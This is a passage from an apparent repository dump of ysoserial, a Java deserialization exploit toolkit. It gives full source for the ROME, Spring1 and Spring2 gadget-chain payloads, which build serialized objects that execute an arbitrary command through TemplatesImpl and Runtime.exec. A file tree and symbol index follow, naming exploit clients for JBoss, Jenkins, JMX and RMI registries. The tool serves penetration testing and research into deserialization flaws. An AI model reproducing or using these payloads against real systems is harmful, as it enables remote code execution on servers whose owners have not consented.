final Class<? extends ObjectPayload> payloadClass = getPayloadClass(payloadType);
if ( payloadClass == null || !ObjectPayload.class.isAssignableFrom(payloadClass) ) {
throw new IllegalArgumentException("Invalid payload type '" + payloadType + "'");
}
try {
final ObjectPayload payload = payloadClass.newInstance();
releasePayload(payload, payloadObject);
}
catch ( Exception e ) {
e.printStackTrace();
}
}
}
}
================================================
FILE: src/main/java/ysoserial/payloads/ROME.java
================================================
package ysoserial.payloads;
import javax.xml.transform.Templates;
import com.sun.syndication.feed.impl.ObjectBean;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
/**
*
* TemplatesImpl.getOutputProperties()
* NativeMethodAccessorImpl.invoke0(Method, Object, Object[])
* NativeMethodAccessorImpl.invoke(Object, Object[])
* DelegatingMethodAccessorImpl.invoke(Object, Object[])
* Method.invoke(Object, Object...)
* ToStringBean.toString(String)
* ToStringBean.toString()
* ObjectBean.toString()
* EqualsBean.beanHashCode()
* ObjectBean.hashCode()
* HashMap<K,V>.hash(Object)
* HashMap<K,V>.readObject(ObjectInputStream)
*
* @author mbechler
*
*/
@Dependencies("rome:rome:1.0")
@Authors({ Authors.MBECHLER })
public class ROME implements ObjectPayload<Object> {
public Object getObject ( String command ) throws Exception {
Object o = Gadgets.createTemplatesImpl(command);
ObjectBean delegate = new ObjectBean(Templates.class, o);
ObjectBean root = new ObjectBean(ObjectBean.class, delegate);
return Gadgets.makeMap(root, root);
}
public static void main ( final String[] args ) throws Exception {
PayloadRunner.run(ROME.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/ReleaseableObjectPayload.java
================================================
package ysoserial.payloads;
/**
* @author mbechler
*
*/
public interface ReleaseableObjectPayload<T> extends ObjectPayload<T> {
void release( T obj ) throws Exception;
}
================================================
FILE: src/main/java/ysoserial/payloads/Spring1.java
================================================
package ysoserial.payloads;
import static java.lang.Class.forName;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Type;
import javax.xml.transform.Templates;
import org.springframework.beans.factory.ObjectFactory;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
/*
Gadget chain:
ObjectInputStream.readObject()
SerializableTypeWrapper.MethodInvokeTypeProvider.readObject()
SerializableTypeWrapper.TypeProvider(Proxy).getType()
AnnotationInvocationHandler.invoke()
HashMap.get()
ReflectionUtils.findMethod()
SerializableTypeWrapper.TypeProvider(Proxy).getType()
AnnotationInvocationHandler.invoke()
HashMap.get()
ReflectionUtils.invokeMethod()
Method.invoke()
Templates(Proxy).newTransformer()
AutowireUtils.ObjectFactoryDelegatingInvocationHandler.invoke()
ObjectFactory(Proxy).getObject()
AnnotationInvocationHandler.invoke()
HashMap.get()
Method.invoke()
TemplatesImpl.newTransformer()
TemplatesImpl.getTransletInstance()
TemplatesImpl.defineTransletClasses()
TemplatesImpl.TransletClassLoader.defineClass()
Pwner*(Javassist-generated).<static init>
Runtime.exec()
*/
@SuppressWarnings({"rawtypes"})
@PayloadTest ( precondition = "isApplicableJavaVersion")
@Dependencies({"org.springframework:spring-core:4.1.4.RELEASE","org.springframework:spring-beans:4.1.4.RELEASE"})
@Authors({ Authors.FROHOFF })
public class Spring1 extends PayloadRunner implements ObjectPayload<Object> {
public Object getObject(final String command) throws Exception {
final Object templates = Gadgets.createTemplatesImpl(command);
final ObjectFactory objectFactoryProxy =
Gadgets.createMemoitizedProxy(Gadgets.createMap("getObject", templates), ObjectFactory.class);
final Type typeTemplatesProxy = Gadgets.createProxy((InvocationHandler)
Reflections.getFirstCtor("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler")
.newInstance(objectFactoryProxy), Type.class, Templates.class);
final Object typeProviderProxy = Gadgets.createMemoitizedProxy(
Gadgets.createMap("getType", typeTemplatesProxy),
forName("org.springframework.core.SerializableTypeWrapper$TypeProvider"));
final Constructor mitpCtor = Reflections.getFirstCtor("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider");
final Object mitp = mitpCtor.newInstance(typeProviderProxy, Object.class.getMethod("getClass", new Class[] {}), 0);
Reflections.setFieldValue(mitp, "methodName", "newTransformer");
return mitp;
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(Spring1.class, args);
}
public static boolean isApplicableJavaVersion() {
return JavaVersion.isAnnInvHUniversalMethodImpl();
}
}
================================================
FILE: src/main/java/ysoserial/payloads/Spring2.java
================================================
package ysoserial.payloads;
import static java.lang.Class.forName;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Type;
import javax.xml.transform.Templates;
import org.springframework.aop.framework.AdvisedSupport;
import org.springframework.aop.target.SingletonTargetSource;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
/**
*
* Just a PoC to proof that the ObjectFactory stuff is not the real problem.
*
* Gadget chain:
* TemplatesImpl.newTransformer()
* Method.invoke(Object, Object...)
* AopUtils.invokeJoinpointUsingReflection(Object, Method, Object[])
* JdkDynamicAopProxy.invoke(Object, Method, Object[])
* $Proxy0.newTransformer()
* Method.invoke(Object, Object...)
* SerializableTypeWrapper$MethodInvokeTypeProvider.readObject(ObjectInputStream)
*
* @author mbechler
*/
@PayloadTest ( precondition = "isApplicableJavaVersion")
@Dependencies ( {
"org.springframework:spring-core:4.1.4.RELEASE", "org.springframework:spring-aop:4.1.4.RELEASE",
// test deps
"aopalliance:aopalliance:1.0", "commons-logging:commons-logging:1.2"
} )
@Authors({ Authors.MBECHLER })
public class Spring2 extends PayloadRunner implements ObjectPayload<Object> {
public Object getObject ( final String command ) throws Exception {
final Object templates = Gadgets.createTemplatesImpl(command);
AdvisedSupport as = new AdvisedSupport();
as.setTargetSource(new SingletonTargetSource(templates));
final Type typeTemplatesProxy = Gadgets.createProxy(
(InvocationHandler) Reflections.getFirstCtor("org.springframework.aop.framework.JdkDynamicAopProxy").newInstance(as),
Type.class,
Templates.class);
final Object typeProviderProxy = Gadgets.createMemoitizedProxy(
Gadgets.createMap("getType", typeTemplatesProxy),
forName("org.springframework.core.SerializableTypeWrapper$TypeProvider"));
Object mitp = Reflections.createWithoutConstructor(forName("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider"));
gitextract_xl98u19g/
├── .editorconfig
├── .github/
│ └── workflows/
│ └── publish.yml
├── .gitignore
├── .travis.yml
├── DISCLAIMER.txt
├── Dockerfile
├── LICENSE.txt
├── README.md
├── appveyor.yml
├── assembly.xml
├── pom.xml
└── src/
├── main/
│ └── java/
│ └── ysoserial/
│ ├── Deserializer.java
│ ├── GeneratePayload.java
│ ├── Serializer.java
│ ├── Strings.java
│ ├── exploit/
│ │ ├── JBoss.java
│ │ ├── JMXInvokeMBean.java
│ │ ├── JRMPClassLoadingListener.java
│ │ ├── JRMPClient.java
│ │ ├── JRMPListener.java
│ │ ├── JSF.java
│ │ ├── JenkinsCLI.java
│ │ ├── JenkinsListener.java
│ │ ├── JenkinsReverse.java
│ │ └── RMIRegistryExploit.java
│ ├── payloads/
│ │ ├── AspectJWeaver.java
│ │ ├── BeanShell1.java
│ │ ├── C3P0.java
│ │ ├── Click1.java
│ │ ├── Clojure.java
│ │ ├── CommonsBeanutils1.java
│ │ ├── CommonsCollections1.java
│ │ ├── CommonsCollections2.java
│ │ ├── CommonsCollections3.java
│ │ ├── CommonsCollections4.java
│ │ ├── CommonsCollections5.java
│ │ ├── CommonsCollections6.java
│ │ ├── CommonsCollections7.java
│ │ ├── DynamicDependencies.java
│ │ ├── FileUpload1.java
│ │ ├── Groovy1.java
│ │ ├── Hibernate1.java
│ │ ├── Hibernate2.java
│ │ ├── JBossInterceptors1.java
│ │ ├── JRMPClient.java
│ │ ├── JRMPListener.java
│ │ ├── JSON1.java
│ │ ├── JavassistWeld1.java
│ │ ├── Jdk7u21.java
│ │ ├── Jython1.java
│ │ ├── MozillaRhino1.java
│ │ ├── MozillaRhino2.java
│ │ ├── Myfaces1.java
│ │ ├── Myfaces2.java
│ │ ├── ObjectPayload.java
│ │ ├── ROME.java
│ │ ├── ReleaseableObjectPayload.java
│ │ ├── Spring1.java
│ │ ├── Spring2.java
│ │ ├── URLDNS.java
│ │ ├── Vaadin1.java
│ │ ├── Wicket1.java
│ │ ├── annotation/
│ │ │ ├── Authors.java
│ │ │ ├── Dependencies.java
│ │ │ └── PayloadTest.java
│ │ └── util/
│ │ ├── ClassFiles.java
│ │ ├── Gadgets.java
│ │ ├── JavaVersion.java
│ │ ├── PayloadRunner.java
│ │ └── Reflections.java
│ └── secmgr/
│ ├── DelegateSecurityManager.java
│ └── ExecCheckingSecurityManager.java
└── test/
└── java/
└── ysoserial/
├── CiTest.java
└── test/
├── CustomDeserializer.java
├── CustomPayloadArgs.java
├── CustomTest.java
├── WrappedTest.java
├── exploit/
│ └── RMIRegistryExploitTest.java
├── payloads/
│ ├── CommandExecTest.java
│ ├── FileUploadTest.java
│ ├── JRMPReverseConnectSMTest.java
│ ├── JRMPReverseConnectTest.java
│ ├── MyfacesTest.java
│ ├── PayloadsTest.java
│ ├── RemoteClassLoadingTest.java
│ └── TestHarnessTest.java
└── util/
├── Callables.java
├── Files.java
├── GadgetsTest.java
├── OS.java
└── Throwables.java
SYMBOL INDEX (458 symbols across 79 files)
FILE: src/main/java/ysoserial/Deserializer.java
class Deserializer (line 11) | public class Deserializer implements Callable<Object> {
method Deserializer (line 14) | public Deserializer(byte[] bytes) { this.bytes = bytes; }
method call (line 16) | public Object call() throws Exception {
method deserialize (line 20) | public static Object deserialize(final byte[] serialized) throws IOExc...
method deserialize (line 25) | public static Object deserialize(final InputStream in) throws ClassNot...
method main (line 30) | public static void main(String[] args) throws ClassNotFoundException, ...
FILE: src/main/java/ysoserial/GeneratePayload.java
class GeneratePayload (line 11) | @SuppressWarnings("rawtypes")
method main (line 16) | public static void main(final String[] args) {
method printUsage (line 46) | private static void printUsage() {
FILE: src/main/java/ysoserial/Serializer.java
class Serializer (line 9) | public class Serializer implements Callable<byte[]> {
method Serializer (line 11) | public Serializer(Object object) {
method call (line 15) | public byte[] call() throws Exception {
method serialize (line 19) | public static byte[] serialize(final Object obj) throws IOException {
method serialize (line 25) | public static void serialize(final Object obj, final OutputStream out)...
FILE: src/main/java/ysoserial/Strings.java
class Strings (line 10) | public class Strings {
method join (line 11) | public static String join(Iterable<String> strings, String sep, String...
method repeat (line 24) | public static String repeat(String str, int num) {
method formatTable (line 30) | public static List<String> formatTable(List<String[]> rows) {
class ToStringComparator (line 52) | public static class ToStringComparator implements Comparator<Object> {
method compare (line 53) | public int compare(Object o1, Object o2) { return o1.toString().comp...
FILE: src/main/java/ysoserial/exploit/JBoss.java
class JBoss (line 96) | @SuppressWarnings ( {
method main (line 101) | public static void main ( String[] args ) {
method doRun (line 131) | private static void doRun ( URI u, final Object payloadObject, String ...
method cleanup (line 166) | private static void cleanup ( ConnectionProvider instance, ConnectionP...
method getConnection (line 204) | private static ConnectionHandlerFactory getConnection ( SocketAddress ...
method getChannel (line 248) | private static Channel getChannel ( ConnectionProviderContextImpl cont...
method makeVersionedConnection (line 271) | private static VersionedConnection makeVersionedConnection ( Channel c )
method doExploit (line 282) | private static void doExploit ( final Object payloadObject, MBeanServe...
class ConsoleLogHandler (line 320) | private static final class ConsoleLogHandler extends Handler {
method publish (line 323) | @Override
method flush (line 329) | @Override
method close (line 335) | @Override
class ConnectionHandlerContextImpl (line 339) | @SuppressWarnings({"deprecation"})
method ConnectionHandlerContextImpl (line 345) | public ConnectionHandlerContextImpl ( ConnectionProviderContextImpl ...
method remoteClosed (line 350) | public void remoteClosed () {}
method getServiceOpenListener (line 353) | public OpenListener getServiceOpenListener ( String serviceType ) {
method getRegisteredService (line 358) | public RegisteredService getRegisteredService ( String serviceType ) {
method getConnectionProviderContext (line 363) | public ConnectionProviderContext getConnectionProviderContext () {
method getConnection (line 368) | public Connection getConnection () {
class ConnectionProviderContextImpl (line 374) | private static final class ConnectionProviderContextImpl implements Co...
method ConnectionProviderContextImpl (line 382) | public ConnectionProviderContextImpl ( OptionMap opts, String endpoi...
method getXnioWorker (line 398) | public XnioWorker getXnioWorker () {
method getXnio (line 403) | public Xnio getXnio () {
method getExecutor (line 408) | public Executor getExecutor () {
method getEndpoint (line 413) | public Endpoint getEndpoint () {
method accept (line 418) | public void accept ( ConnectionHandlerFactory connectionHandlerFacto...
FILE: src/main/java/ysoserial/exploit/JMXInvokeMBean.java
class JMXInvokeMBean (line 16) | public class JMXInvokeMBean {
method main (line 18) | public static void main(String[] args) throws Exception {
FILE: src/main/java/ysoserial/exploit/JRMPClassLoadingListener.java
class JRMPClassLoadingListener (line 28) | public class JRMPClassLoadingListener {
method main (line 30) | public static final void main ( final String[] args ) {
FILE: src/main/java/ysoserial/exploit/JRMPClient.java
class JRMPClient (line 31) | @SuppressWarnings ( {
method main (line 36) | public static final void main ( final String[] args ) {
method makeDGCCall (line 55) | public static void makeDGCCall ( String hostname, int port, Object pay...
class MarshalOutputStream (line 98) | static final class MarshalOutputStream extends ObjectOutputStream {
method MarshalOutputStream (line 103) | public MarshalOutputStream (OutputStream out, URL u) throws IOExcept...
method MarshalOutputStream (line 108) | MarshalOutputStream ( OutputStream out ) throws IOException {
method annotateClass (line 112) | @Override
method annotateProxyClass (line 134) | @Override
FILE: src/main/java/ysoserial/exploit/JRMPListener.java
class JRMPListener (line 45) | @SuppressWarnings ( {
method JRMPListener (line 59) | public JRMPListener ( int port, Object payloadObject ) throws NumberFo...
method JRMPListener (line 65) | public JRMPListener (int port, String className, URL classpathUrl) thr...
method waitFor (line 73) | public boolean waitFor ( int i ) {
method close (line 93) | public void close () {
method main (line 105) | public static final void main ( final String[] args ) {
method run (line 129) | public void run () {
method doMessage (line 216) | private void doMessage ( Socket s, DataInputStream in, DataOutputStrea...
method doCall (line 244) | private void doCall ( DataInputStream in, DataOutputStream out, Object...
method makeDummyObject (line 296) | @SuppressWarnings({"deprecation"})
class Dummy (line 313) | public static class Dummy implements Serializable {
FILE: src/main/java/ysoserial/exploit/JSF.java
class JSF (line 35) | public class JSF {
method main (line 37) | public static void main ( String[] args ) {
FILE: src/main/java/ysoserial/exploit/JenkinsCLI.java
class JenkinsCLI (line 41) | public class JenkinsCLI {
method main (line 42) | public static final void main ( final String[] args ) {
method getPropertyCallable (line 73) | public static Callable<?, ?> getPropertyCallable ( final Object prop )
method getCliPort (line 85) | public static InetSocketAddress getCliPort ( String jenkinsUrl ) throw...
method openChannel (line 103) | public static Channel openChannel ( InetSocketAddress isa ) throws IOE...
FILE: src/main/java/ysoserial/exploit/JenkinsListener.java
class JenkinsListener (line 48) | @SuppressWarnings ( {
method main (line 53) | public static final void main ( final String[] args ) {
method makeIsPresentOnRemoteCallable (line 117) | private static Object makeIsPresentOnRemoteCallable ( int oid, Object ...
method parseObjIdAndExploit (line 128) | private static void parseObjIdAndExploit ( final String[] args, final ...
method exploit (line 165) | private static void exploit ( InetSocketAddress isa, long obj, int o1,...
FILE: src/main/java/ysoserial/exploit/JenkinsReverse.java
class JenkinsReverse (line 27) | public class JenkinsReverse {
method main (line 29) | public static final void main ( final String[] args ) {
FILE: src/main/java/ysoserial/exploit/RMIRegistryExploit.java
class RMIRegistryExploit (line 27) | @SuppressWarnings({"rawtypes", "unchecked"})
class TrustAllSSL (line 29) | private static class TrustAllSSL implements X509TrustManager {
method getAcceptedIssuers (line 31) | public X509Certificate[] getAcceptedIssuers() { return ANY_CA; }
method checkServerTrusted (line 32) | public void checkServerTrusted(final X509Certificate[] c, final Stri...
method checkClientTrusted (line 33) | public void checkClientTrusted(final X509Certificate[] c, final Stri...
class RMISSLClientSocketFactory (line 36) | private static class RMISSLClientSocketFactory implements RMIClientSoc...
method createSocket (line 37) | public Socket createSocket(String host, int port) throws IOException {
method main (line 49) | public static void main(final String[] args) throws Exception {
method exploit (line 68) | public static void exploit(final Registry registry,
FILE: src/main/java/ysoserial/payloads/AspectJWeaver.java
class AspectJWeaver (line 41) | @PayloadTest(skip="non RCE")
method getObject (line 48) | public Serializable getObject(final String command) throws Exception {
method main (line 103) | public static void main(String[] args) throws Exception {
FILE: src/main/java/ysoserial/payloads/BeanShell1.java
class BeanShell1 (line 22) | @SuppressWarnings({ "rawtypes", "unchecked" })
method getObject (line 27) | public PriorityQueue getObject(String command) throws Exception {
method main (line 59) | public static void main(final String[] args) throws Exception {
FILE: src/main/java/ysoserial/payloads/C3P0.java
class C3P0 (line 41) | @PayloadTest ( harness="ysoserial.test.payloads.RemoteClassLoadingTest" )
method getObject (line 45) | public Object getObject ( String command ) throws Exception {
class PoolSource (line 62) | private static final class PoolSource implements ConnectionPoolDataSou...
method PoolSource (line 67) | public PoolSource ( String className, String url ) {
method getReference (line 72) | public Reference getReference () throws NamingException {
method getLogWriter (line 76) | public PrintWriter getLogWriter () throws SQLException {return null;}
method setLogWriter (line 77) | public void setLogWriter ( PrintWriter out ) throws SQLException {}
method setLoginTimeout (line 78) | public void setLoginTimeout ( int seconds ) throws SQLException {}
method getLoginTimeout (line 79) | public int getLoginTimeout () throws SQLException {return 0;}
method getParentLogger (line 80) | public Logger getParentLogger () throws SQLFeatureNotSupportedExcept...
method getPooledConnection (line 81) | public PooledConnection getPooledConnection () throws SQLException {...
method getPooledConnection (line 82) | public PooledConnection getPooledConnection ( String user, String pa...
method main (line 87) | public static void main ( final String[] args ) throws Exception {
FILE: src/main/java/ysoserial/payloads/Click1.java
class Click1 (line 47) | @SuppressWarnings({ "rawtypes", "unchecked" })
method getObject (line 52) | public Object getObject(final String command) throws Exception {
method main (line 78) | public static void main(final String[] args) throws Exception {
FILE: src/main/java/ysoserial/payloads/Clojure.java
class Clojure (line 27) | @Dependencies({"org.clojure:clojure:1.8.0"})
method getObject (line 31) | public Map<?, ?> getObject(final String command) throws Exception {
method main (line 70) | public static void main(final String[] args) throws Exception {
FILE: src/main/java/ysoserial/payloads/CommonsBeanutils1.java
class CommonsBeanutils1 (line 14) | @SuppressWarnings({ "rawtypes", "unchecked" })
method getObject (line 19) | public Object getObject(final String command) throws Exception {
method main (line 41) | public static void main(final String[] args) throws Exception {
FILE: src/main/java/ysoserial/payloads/CommonsCollections1.java
class CommonsCollections1 (line 43) | @SuppressWarnings({"rawtypes", "unchecked"})
method getObject (line 49) | public InvocationHandler getObject(final String command) throws Except...
method main (line 80) | public static void main(final String[] args) throws Exception {
method isApplicableJavaVersion (line 84) | public static boolean isApplicableJavaVersion() {
FILE: src/main/java/ysoserial/payloads/CommonsCollections2.java
class CommonsCollections2 (line 27) | @SuppressWarnings({ "rawtypes", "unchecked" })
method getObject (line 32) | public Queue<Object> getObject(final String command) throws Exception {
method main (line 54) | public static void main(final String[] args) throws Exception {
FILE: src/main/java/ysoserial/payloads/CommonsCollections3.java
class CommonsCollections3 (line 29) | @SuppressWarnings({"rawtypes", "unchecked", "restriction"})
method getObject (line 35) | public Object getObject(final String command) throws Exception {
method main (line 61) | public static void main(final String[] args) throws Exception {
method isApplicableJavaVersion (line 65) | public static boolean isApplicableJavaVersion() {
FILE: src/main/java/ysoserial/payloads/CommonsCollections4.java
class CommonsCollections4 (line 26) | @SuppressWarnings({ "rawtypes", "unchecked", "restriction" })
method getObject (line 31) | public Queue<Object> getObject(final String command) throws Exception {
method main (line 61) | public static void main(final String[] args) throws Exception {
FILE: src/main/java/ysoserial/payloads/CommonsCollections5.java
class CommonsCollections5 (line 51) | @SuppressWarnings({"rawtypes", "unchecked"})
method getObject (line 57) | public BadAttributeValueExpException getObject(final String command) t...
method main (line 91) | public static void main(final String[] args) throws Exception {
method isApplicableJavaVersion (line 95) | public static boolean isApplicableJavaVersion() {
FILE: src/main/java/ysoserial/payloads/CommonsCollections6.java
class CommonsCollections6 (line 36) | @SuppressWarnings({"rawtypes", "unchecked"})
method getObject (line 41) | public Serializable getObject(final String command) throws Exception {
method main (line 106) | public static void main(final String[] args) throws Exception {
FILE: src/main/java/ysoserial/payloads/CommonsCollections7.java
class CommonsCollections7 (line 35) | @SuppressWarnings({"rawtypes", "unchecked"})
method getObject (line 41) | public Hashtable getObject(final String command) throws Exception {
method main (line 84) | public static void main(final String[] args) throws Exception {
FILE: src/main/java/ysoserial/payloads/DynamicDependencies.java
type DynamicDependencies (line 8) | public interface DynamicDependencies {
FILE: src/main/java/ysoserial/payloads/FileUpload1.java
class FileUpload1 (line 40) | @Dependencies ( {
method isApplicableJavaVersion (line 47) | public static boolean isApplicableJavaVersion() {
method getObject (line 51) | public DiskFileItem getObject ( String command ) throws Exception {
method release (line 76) | public void release ( DiskFileItem obj ) throws Exception {
method copyAndDelete (line 82) | private static DiskFileItem copyAndDelete ( String copyAndDelete, Stri...
method write (line 88) | private static DiskFileItem write ( String dir, byte[] data ) throws I...
method writePre131 (line 94) | private static DiskFileItem writePre131 ( String file, byte[] data ) t...
method makePayload (line 99) | private static DiskFileItem makePayload ( int thresh, String repoPath,...
method main (line 115) | public static void main ( final String[] args ) throws Exception {
FILE: src/main/java/ysoserial/payloads/Groovy1.java
class Groovy1 (line 29) | @SuppressWarnings({ "rawtypes", "unchecked" })
method getObject (line 34) | public InvocationHandler getObject(final String command) throws Except...
method main (line 44) | public static void main(final String[] args) throws Exception {
FILE: src/main/java/ysoserial/payloads/Hibernate1.java
class Hibernate1 (line 44) | @Authors({ Authors.MBECHLER })
method isApplicableJavaVersion (line 47) | public static boolean isApplicableJavaVersion() {
method getDependencies (line 51) | public static String[] getDependencies () {
method makeGetter (line 67) | public static Object makeGetter ( Class<?> tplClass, String method ) t...
method makeHibernate4Getter (line 76) | public static Object makeHibernate4Getter ( Class<?> tplClass, String ...
method makeHibernate5Getter (line 96) | public static Object makeHibernate5Getter ( Class<?> tplClass, String ...
method getObject (line 108) | public Object getObject ( String command ) throws Exception {
method makeCaller (line 115) | static Object makeCaller ( Object tpl, Object getters ) throws NoSuchM...
method makeHibernate45Caller (line 124) | static Object makeHibernate45Caller ( Object tpl, Object getters ) thr...
method makeHibernate3Caller (line 148) | static Object makeHibernate3Caller ( Object tpl, Object getters ) thro...
method main (line 182) | public static void main ( final String[] args ) throws Exception {
FILE: src/main/java/ysoserial/payloads/Hibernate2.java
class Hibernate2 (line 42) | @SuppressWarnings ( {
method isApplicableJavaVersion (line 48) | public static boolean isApplicableJavaVersion() {
method getDependencies (line 52) | public static String[] getDependencies () {
method getObject (line 56) | public Object getObject ( String command ) throws Exception {
method main (line 63) | public static void main ( final String[] args ) throws Exception {
FILE: src/main/java/ysoserial/payloads/JBossInterceptors1.java
class JBossInterceptors1 (line 31) | @SuppressWarnings({"rawtypes", "unchecked"})
method isApplicableJavaVersion (line 38) | public static boolean isApplicableJavaVersion() {
method getObject (line 42) | public Object getObject(final String command) throws Exception {
method main (line 87) | public static void main(final String[] args) throws Exception {
FILE: src/main/java/ysoserial/payloads/JRMPClient.java
class JRMPClient (line 49) | @SuppressWarnings ( {
method getObject (line 56) | public Registry getObject ( final String command ) throws Exception {
method main (line 80) | public static void main ( final String[] args ) throws Exception {
FILE: src/main/java/ysoserial/payloads/JRMPListener.java
class JRMPListener (line 34) | @SuppressWarnings ( {
method getObject (line 41) | public UnicastRemoteObject getObject ( final String command ) throws E...
method main (line 54) | public static void main ( final String[] args ) throws Exception {
FILE: src/main/java/ysoserial/payloads/JSON1.java
class JSON1 (line 59) | @SuppressWarnings ( {
method getObject (line 70) | public Map getObject ( String command ) throws Exception {
method makeCallerChain (line 78) | public static Map makeCallerChain ( Object payload, Class... ifaces ) ...
method main (line 114) | public static void main ( final String[] args ) throws Exception {
FILE: src/main/java/ysoserial/payloads/JavassistWeld1.java
class JavassistWeld1 (line 31) | @SuppressWarnings({"rawtypes", "unchecked"})
method isApplicableJavaVersion (line 38) | public static boolean isApplicableJavaVersion() {
method getObject (line 42) | public Object getObject(final String command) throws Exception {
method main (line 87) | public static void main(final String[] args) throws Exception {
FILE: src/main/java/ysoserial/payloads/Jdk7u21.java
class Jdk7u21 (line 56) | @SuppressWarnings({ "rawtypes", "unchecked" })
method getObject (line 62) | public Object getObject(final String command) throws Exception {
method isApplicableJavaVersion (line 86) | public static boolean isApplicableJavaVersion() {
method main (line 91) | public static void main(final String[] args) throws Exception {
FILE: src/main/java/ysoserial/payloads/Jython1.java
class Jython1 (line 42) | @PayloadTest(skip="non RCE")
method getObject (line 48) | public PriorityQueue getObject(String command) throws Exception {
method main (line 105) | public static void main(final String[] args) throws Exception {
FILE: src/main/java/ysoserial/payloads/MozillaRhino1.java
class MozillaRhino1 (line 21) | @SuppressWarnings({"rawtypes", "unchecked"})
method getObject (line 27) | public Object getObject(final String command) throws Exception {
method main (line 69) | public static void main(final String[] args) throws Exception {
method isApplicableJavaVersion (line 73) | public static boolean isApplicableJavaVersion() {
FILE: src/main/java/ysoserial/payloads/MozillaRhino2.java
class MozillaRhino2 (line 49) | @SuppressWarnings({"rawtypes", "unchecked"})
method getObject (line 54) | public Object getObject( String command) throws Exception {
method customWriteAdapterObject (line 99) | public static void customWriteAdapterObject(Object javaObject, ObjectO...
method main (line 105) | public static void main(final String[] args) throws Exception {
FILE: src/main/java/ysoserial/payloads/Myfaces1.java
class Myfaces1 (line 43) | @PayloadTest(skip="Requires running MyFaces, no direct execution")
method getObject (line 47) | public Object getObject ( String command ) throws Exception {
method getDependencies (line 52) | public static String[] getDependencies () {
method makeExpressionPayload (line 76) | public static Object makeExpressionPayload ( String expr ) throws Ille...
method main (line 91) | public static void main ( final String[] args ) throws Exception {
FILE: src/main/java/ysoserial/payloads/Myfaces2.java
class Myfaces2 (line 32) | @PayloadTest(harness="ysoserial.test.payloads.MyfacesTest", precondition...
method isApplicableJavaVersion (line 35) | public static boolean isApplicableJavaVersion() {
method getDependencies (line 39) | public static String[] getDependencies () {
method getObject (line 44) | public Object getObject ( String command ) throws Exception {
method main (line 67) | public static void main ( final String[] args ) throws Exception {
FILE: src/main/java/ysoserial/payloads/ObjectPayload.java
type ObjectPayload (line 13) | @SuppressWarnings ( "rawtypes" )
method getObject (line 20) | public T getObject ( String command ) throws Exception;
class Utils (line 22) | public static class Utils {
method getPayloadClasses (line 25) | public static Set<Class<? extends ObjectPayload>> getPayloadClasses ...
method getPayloadClass (line 38) | @SuppressWarnings ( "unchecked" )
method makePayloadObject (line 59) | public static Object makePayloadObject ( String payloadType, String ...
method releasePayload (line 78) | @SuppressWarnings ( "unchecked" )
method releasePayload (line 86) | public static void releasePayload ( String payloadType, Object paylo...
FILE: src/main/java/ysoserial/payloads/ROME.java
class ROME (line 31) | @Dependencies("rome:rome:1.0")
method getObject (line 35) | public Object getObject ( String command ) throws Exception {
method main (line 43) | public static void main ( final String[] args ) throws Exception {
FILE: src/main/java/ysoserial/payloads/ReleaseableObjectPayload.java
type ReleaseableObjectPayload (line 8) | public interface ReleaseableObjectPayload<T> extends ObjectPayload<T> {
method release (line 10) | void release( T obj ) throws Exception;
FILE: src/main/java/ysoserial/payloads/Spring1.java
class Spring1 (line 50) | @SuppressWarnings({"rawtypes"})
method getObject (line 56) | public Object getObject(final String command) throws Exception {
method main (line 77) | public static void main(final String[] args) throws Exception {
method isApplicableJavaVersion (line 81) | public static boolean isApplicableJavaVersion() {
FILE: src/main/java/ysoserial/payloads/Spring2.java
class Spring2 (line 39) | @PayloadTest ( precondition = "isApplicableJavaVersion")
method getObject (line 48) | public Object getObject ( final String command ) throws Exception {
method main (line 69) | public static void main ( final String[] args ) throws Exception {
method isApplicableJavaVersion (line 73) | public static boolean isApplicableJavaVersion() {
FILE: src/main/java/ysoserial/payloads/URLDNS.java
class URLDNS (line 43) | @SuppressWarnings({ "rawtypes", "unchecked" })
method getObject (line 49) | public Object getObject(final String url) throws Exception {
method main (line 64) | public static void main(final String[] args) throws Exception {
class SilentURLStreamHandler (line 77) | static class SilentURLStreamHandler extends URLStreamHandler {
method openConnection (line 79) | protected URLConnection openConnection(URL u) throws IOException {
method getHostAddress (line 83) | protected synchronized InetAddress getHostAddress(URL u) {
FILE: src/main/java/ysoserial/payloads/Vaadin1.java
class Vaadin1 (line 16) | @Dependencies ( { "com.vaadin:vaadin-server:7.7.14", "com.vaadin:vaadin-...
method getObject (line 59) | @Override
method isApplicableJavaVersion (line 74) | public static boolean isApplicableJavaVersion() {
method main (line 78) | public static void main(final String[] args) throws Exception {
FILE: src/main/java/ysoserial/payloads/Wicket1.java
class Wicket1 (line 49) | @PayloadTest(harness="ysoserial.test.payloads.FileUploadTest", flaky="po...
method getObject (line 54) | public DiskFileItem getObject(String command) throws Exception {
method release (line 80) | public void release(DiskFileItem obj) throws Exception {
method copyAndDelete (line 83) | private static DiskFileItem copyAndDelete ( String copyAndDelete, Stri...
method write (line 88) | private static DiskFileItem write ( String dir, byte[] data ) throws I...
method writeOldJRE (line 93) | private static DiskFileItem writeOldJRE(String file, byte[] data) thro...
method makePayload (line 97) | private static DiskFileItem makePayload(int thresh, String repoPath, S...
method main (line 112) | public static void main ( final String[] args ) throws Exception {
FILE: src/main/java/ysoserial/payloads/annotation/Authors.java
class Utils (line 31) | public static class Utils {
method getAuthors (line 32) | public static String[] getAuthors(AnnotatedElement annotated) {
FILE: src/main/java/ysoserial/payloads/annotation/Dependencies.java
class Utils (line 14) | public static class Utils {
